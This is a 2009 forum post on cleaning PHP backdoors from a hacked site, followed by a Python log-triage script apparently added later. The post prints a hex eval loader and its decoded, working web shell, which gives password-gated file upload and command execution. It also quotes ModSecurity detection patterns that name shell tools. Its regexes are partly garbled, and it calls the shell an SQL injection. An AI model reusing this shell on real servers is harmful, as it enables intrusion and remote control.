Old 09-21-2009, 11:24 AM  
HEAT
Confirmed User
 
Join Date: Sep 2003
Posts: 2,255
Quote:
Originally Posted by hjnet View Post
Did you check that the "696620287374" is the same in all backdoor files? Because I think a "smart" hacker would use randomized files to ensure they're harder to detect.
Yes, all backdoors had the same strings starting with 6966202873 in my case.
Here is the full PHP code:
Quote:
echo " ";
$s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
$sss = "";
$k = 0;
for ( ; $k < strlen( $s ); $k += 2 )
{
$ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
$sss .= $ss;
}
eval( $sss );
$ssss = "************************************************* ************************************************** *********************************";
echo "\r\n";
?>
Code decrypted:
Quote:
if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);}}
I found out it's just another ordinary blind SQL injection attack that has this pattern:

Quote:
\\b(??:s(?:ys(???:process|tabl)e|filegroup| object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubst r(?:ing)?)|user_(???:constrain|objec)t|tab(?:_ column|le)|ind_column|user)s|password|group)|a(?:t t(?:rel|typ)id|ll_objects)|object_(??:nam|typ)e| id)| ..." at ARGS:ccc.
I don't think this string can be randomized, since it is a PHP shell and uses the 'shell_exec' function.
Or, if you have mod_security installed, look in /var/log/httpd/modsec_debug.log.

Whatever code they have in the file, mod_security blocks system calls made via the web. You will find a bunch of log entries like this:
Quote:
[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.e xe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "domain.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
So analyze the log file and catch all PHP files sending system commands. Then you can compare all the strings.


And for the infected web files, yes, it looks like the backdoors didn't inject the same JS code; each one has a different encrypted malware URL. So classify all HTML/PHP files that have 777 permissions, then extract those different pieces of code and make your own grep strings for a full search.
Luckily, I had only one common string.
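The triage HEAT describes (pull the flagged PHP URIs out of the ModSecurity log, then check each file for the hex-string-plus-eval loader and decode it) can be scripted. The following is an added example, not code from the post or from ModSecurity; the log lines, IPs, hostname, URIs and PHP sources in it are constructed in-memory samples modelled on the format quoted above, and the file contents are passed in as a dict instead of being read from the document root.

```python
import re

# Constructed sample of ModSecurity 2.x error-log lines, modelled on the entry
# quoted in the post. Client IPs, hostname, URIs and unique_ids are placeholders.
SAMPLE_LOG = """\
[Sun Sep 20 11:00:33 2009] [error] [client 192.0.2.10] ModSecurity: Access denied with code 501 (phase 2). Pattern match "..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "example.com"] [uri "/vid/86/sample1.php"] [unique_id "CONSTRUCTED0001"]
[Sun Sep 20 11:02:10 2009] [error] [client 192.0.2.10] ModSecurity: Access denied with code 501 (phase 2). Pattern match "..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a ls"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "example.com"] [uri "/vid/86/sample1.php"] [unique_id "CONSTRUCTED0002"]
[Sun Sep 20 11:05:41 2009] [error] [client 192.0.2.11] ModSecurity: Access denied with code 501 (phase 2). Pattern match "..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a id"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "example.com"] [uri "/img/sample2.php"] [unique_id "CONSTRUCTED0003"]
[Sun Sep 20 11:07:00 2009] [error] [client 192.0.2.12] ModSecurity: Warning. Pattern match "..." at ARGS:q. [id "999001"] [msg "Unrelated Rule"] [hostname "example.com"] [uri "/search.php"] [unique_id "CONSTRUCTED0004"]
"""

# Constructed decoded payload: a harmless command-capable call, enough to show
# that the decoder and the dangerous-call check work. Hex-encoded below.
PAYLOAD = "if (function_exists('shell_exec')) { echo shell_exec('uptime'); }"

# Constructed PHP file shaped like the loader quoted in the post: a long hex
# literal, a chr("0x"..) loop, and eval() of the result.
SAMPLE_PHP = (
    '<?php\necho " ";\n'
    '$s = "' + PAYLOAD.encode().hex() + '";\n'
    '$sss = "";\n$k = 0;\n'
    'for ( ; $k < strlen( $s ); $k += 2 ) { $sss .= chr( "0x".substr( $s, $k, 2 ) + 0 ); }\n'
    'eval( $sss );\n?>'
)
BENIGN_PHP = '<?php echo "hello"; ?>'
# Constructed stand-in for the document root: uri -> file contents.
# /img/sample2.php is deliberately absent (deleted or unreadable).
SAMPLE_FILES = {"/vid/86/sample1.php": SAMPLE_PHP, "/search.php": BENIGN_PHP}

# Bracketed key/value fields such as [id "950006"] or [uri "/x.php"]; the
# value may contain backslash escapes like \x0a.
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
CLIENT_RE = re.compile(r'\[client ([\d.:a-fA-F]+)\]')
# A double-quoted string literal made only of hex digits, 16+ chars long.
HEX_STRING_RE = re.compile(r'\$(\w+)\s*=\s*"([0-9a-fA-F]{16,})"\s*;')
DANGEROUS = ('eval', 'exec', 'passthru', 'system', 'shell_exec',
             'popen', 'proc_open', 'move_uploaded_file')


def parse_modsec_line(line):
    """Return the bracketed fields of one ModSecurity log line as a dict."""
    fields = dict(FIELD_RE.findall(line))
    m = CLIENT_RE.search(line)
    if m:
        fields['client'] = m.group(1)
    return fields


def flagged_uris(log_text, msg_filter="System Command Injection"):
    """Map each URI hit by a rule whose msg contains msg_filter to count, clients and rule ids."""
    hits = {}
    for line in log_text.splitlines():
        f = parse_modsec_line(line)
        if 'uri' not in f or msg_filter not in f.get('msg', ''):
            continue
        entry = hits.setdefault(f['uri'], {'count': 0, 'clients': set(), 'ids': set()})
        entry['count'] += 1
        entry['clients'].add(f.get('client', '?'))
        entry['ids'].add(f.get('id', '?'))
    return hits


def decode_hex_payloads(php_source):
    """Decode every long hex literal byte-pair-wise, as the loader's chr("0x"..) loop does."""
    results = []
    for var, hexstr in HEX_STRING_RE.findall(php_source):
        if len(hexstr) % 2:
            continue  # odd length cannot be a byte string; skip rather than guess
        results.append((var, bytes.fromhex(hexstr).decode('latin-1')))
    return results


def dangerous_calls(code):
    """Return the DANGEROUS names that appear as function calls in code."""
    return {n for n in DANGEROUS if re.search(r'\b' + n + r'\s*\(', code)}


def is_hex_eval_loader(php_source):
    """True when a long hex literal and an eval() call occur together in the source."""
    return bool(HEX_STRING_RE.search(php_source)) and bool(re.search(r'\beval\s*\(', php_source))


def triage(log_text, sources):
    """Join log hits with file contents: loader shape and decoded dangerous calls per flagged URI."""
    report = {}
    for uri, hit in flagged_uris(log_text).items():
        src = sources.get(uri, '')
        calls = set()
        for _var, decoded in decode_hex_payloads(src):
            calls |= dangerous_calls(decoded)
        report[uri] = {'hits': hit['count'], 'clients': sorted(hit['clients']),
                       'hex_eval_loader': is_hex_eval_loader(src), 'decoded_calls': calls}
    return report


if __name__ == "__main__":
    for uri, info in triage(SAMPLE_LOG, SAMPLE_FILES).items():
        print(uri, info)
```

On a real host, `sources` would be built by reading each flagged URI under the document root, and the decoded payload strings from every loader are what you would diff against each other to find the common grep pattern HEAT mentions; a flagged URI whose file is missing (like the second sample here) is itself worth noting, since the attacker may have cleaned up behind them.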

Last edited by HEAT; 09-21-2009 at 11:28 AM..